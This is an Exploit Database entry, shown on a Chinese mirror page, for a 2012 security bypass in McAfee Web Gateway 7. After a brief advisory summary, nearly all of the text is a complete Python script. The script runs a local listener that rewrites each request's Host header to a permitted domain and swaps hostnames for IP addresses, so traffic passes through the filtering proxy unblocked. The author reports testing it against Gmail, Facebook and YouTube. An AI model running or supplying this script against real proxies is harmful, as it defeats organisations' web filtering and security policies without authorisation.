McAfee Web Gateway 7.1.5.x – ‘Host’ HTTP Header Security Bypass

• Exploit Database
• 115 阅读

• 作者： Gabriel Menezes Nunes
  日期： 2012-04-16
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/37081/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166

  source: https://www.securityfocus.com/bid/53015/info   McAfee Web Gateway is prone to a security-bypass vulnerability because it fails to properly enforce filtering rules.   A successful attack will allow an attacker to bypass intended security restrictions; this may aid in other attacks.   McAfee Web Gateway 7 is vulnerable; other versions may also be affected.   import socket,struct,sys,time from threading import Thread     #The timeOut can be changed if the proxy is slow. #Tested in GMail, Facebook, Youtube and several blocked sites. #The proxy get the Host field of the http header and do not verify anything else. #It trusts on the HTTP Header and it can be modified by the attacker.   timeOut = 0.8 isGet = 0 hostNameG = "" pacoteGet = "" port = 8080 #Listening port proxyAddr = "vulnerableProxy.com" #vulnerable proxy proxyPort = 8080 # proxy port   def handle(client,globalSock): client.settimeout(timeOut) global hostNameG   while 1: dados = "" tam = 0 while 1: try: dados2 = client.recv(1024) tam = tam + len(dados2) dados = dados + dados2 except socket.timeout: break   dd = dados.find("CONNECT") #if the packet is a CONNECT METHOD if dd != -1: dd2 = dados.find(":") hostName = dados[dd+8:dd2] ipAddr = socket.gethostbyname(hostName) #changing the method to connect to the ip address, not the dns domain pacote = dados hostHeader = "Host: " + hostName pacote = pacote.replace(hostHeader, "Host: www.uol.com.br") #changing the host field with a value that is accepted by the proxy pacote = pacote.replace(hostName, ipAddr) #changind domain for ip dados = pacote getd = dados.find("GET ") getd2 = dados.find("//") getd3 = dados.find("/", getd2+2) hostName = dados[getd2+2:getd3] if getd != -1: globalSock.close() globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) globalSock.connect((proxyAddr,proxyPort)) globalSock.settimeout(timeOut) getd2 = dados.find("//") getd3 = dados.find("/", getd2+2) hostName = dados[getd2+2:getd3] proxyAuth = "" proxyAuthN = dados.find("Proxy-Authorization:") if proxyAuthN != -1: proxyAuthNN = dados.find("\r\n", proxyAuthN) proxyAuth = dados[proxyAuthN:proxyAuthNN] ipAddr = socket.gethostbyname(hostName) info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n" if proxyAuthN != -1: info += proxyAuth + "\r\n" info += "Host: www.uol.com.br\r\n\r\n" globalSock.send(info) tam = 0 gdata = "" while 1: try: gdata2 = globalSock.recv(1024) tam = tam + len(gdata2) gdata = gdata + gdata2 if len(gdata2) == 0: break except socket.timeout: break globalSock.send(dados) tam = 0 gdata = "" while 1: try: gdata2 = globalSock.recv(1024) if len(gdata2) > 0: client.send(gdata2) tam = tam + len(gdata2) gdata = gdata + gdata2 if len(gdata2) == 0: break except socket.timeout: break     print 'Proxy Bypass' print 'by Gabriel Menezes Nunes' print 'Tested on McAfee Web Gateway 7 and Squid Proxy' sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Attacked Proxy:', print proxyAddr print 'Listening on', print port sockzao.bind(("",port))   sockzao.listen(6)   while 1: print 'Waiting for connections' client, address = sockzao.accept() print 'Client Connected' print address globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) globalSock.connect((proxyAddr,proxyPort)) globalSock.settimeout(timeOut)   t = Thread(target=handle, args=(client,globalSock,)) t.start()